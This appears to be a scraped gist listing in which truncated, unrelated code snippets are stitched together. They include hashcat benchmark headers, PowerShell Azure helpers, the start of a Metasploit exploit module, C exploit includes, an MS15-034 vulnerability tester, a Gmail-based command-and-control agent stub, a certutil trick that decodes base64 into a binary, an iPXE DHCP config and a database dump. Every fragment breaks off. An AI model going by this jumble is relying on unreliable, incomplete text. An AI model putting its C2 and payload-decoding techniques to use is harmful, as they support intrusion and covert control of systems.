Product: Sagitta Brutalis 980 (PN S2480-GTX-980)
Software: cudaHashcat 1.36b25, ForceWare 346.35
Accelerator: 8x Nvidia GTX 980 reference design, +250 clock offset
| function azrdp { | |
| <# | |
| .Author | |
| Trevor Sullivan <[email protected]> | |
| .Description | |
| Invoke a RDP session to an Azure Virtual Machine, without having to type the | |
| Cloud Service name or Virtual Machine name. | |
| .Outputs |
| function Dictionary | |
| { | |
| param([Type[]]$Type, [Hashtable]$Hashtable) | |
| $KeyType = $Type[0] | |
| $ValueType = $Type[1] | |
| $Dictionary = New-Object -TypeName "System.Collections.Generic.Dictionary[$KeyType,$ValueType]" | |
| $Hashtable.GetEnumerator() | % { |
| ## | |
| # This module requires Metasploit: http://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| require 'msf/core' | |
| class Metasploit4 < Msf::Exploit::Remote |
| #define _GNU_SOURCE | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <stdlib.h> | |
| #include <fcntl.h> | |
| #include <signal.h> | |
| #include <elf.h> | |
| #include <err.h> | |
| #include <syslog.h> | |
| #include <sched.h> |
| function Test-MS15034($url) { | |
| try { | |
| $wr = [Net.WebRequest]::Create($url) | |
| $wr.AddRange('bytes',234234,28768768) | |
| $res = $wr.GetResponse() | |
| $status = $res.statuscode | |
| Write-Output "$status means it is not vulnerable" | |
| $res.Close() | |
| }catch { | |
| if ($Error[0].Exception.InnerException.Response.StatusCode -eq '416') {Write-Output "Site is vulnerable"} |
| Below code tries to pull commands from Gmail. | |
| #function Invoke-PsGcatAgentIMAP | |
| #{ | |
| [CmdletBinding()] Param( | |
| [Parameter(Position = 0, Mandatory = $false)] | |
| [String] | |
| $Username, |
Product: Sagitta Brutalis 980 (PN S2480-GTX-980)
Software: cudaHashcat 1.36b25, ForceWare 346.35
Accelerator: 8x Nvidia GTX 980 reference design, +250 clock offset
Add the following chunk to your existing ISC dhcpd.conf file.
if exists user-class and ( option user-class = "iPXE" ) {
filename "http://boot.smidsrod.lan/boot.ipxe";
}
else {
filename "undionly.kpxe";
}
(or see https://gist.github.com/4008017 for a more elaborate setup
| echo -----BEGIN CERTIFICATE----- > encoded.txt | |
| echo Just Base64 encode your binary data | |
| echo TVoAAA== >> encoded.txt | |
| echo -----END CERTIFICATE----- >> encoded.txt | |
| certutil -decode encoded.txt decoded.bin |
| Database: heroku_1ed5a148e6d9415 | |
| Table: black_cards | |
| [16 entries] | |
| +----+--------------------------------------------------------------------------------------------------------------+ | |
| | id | content | | |
| +----+--------------------------------------------------------------------------------------------------------------+ | |
| | 1 | _____ means never having to say you're sorry. | | |
| | 2 | The pen tester found _____ in the trash while dumpster diving. | | |
| | 3 | Our CIO has a framed a picture of _____. | | |
| | 4 | 9 out of 10 experts agree, _____ will increase your security effectiveness. | |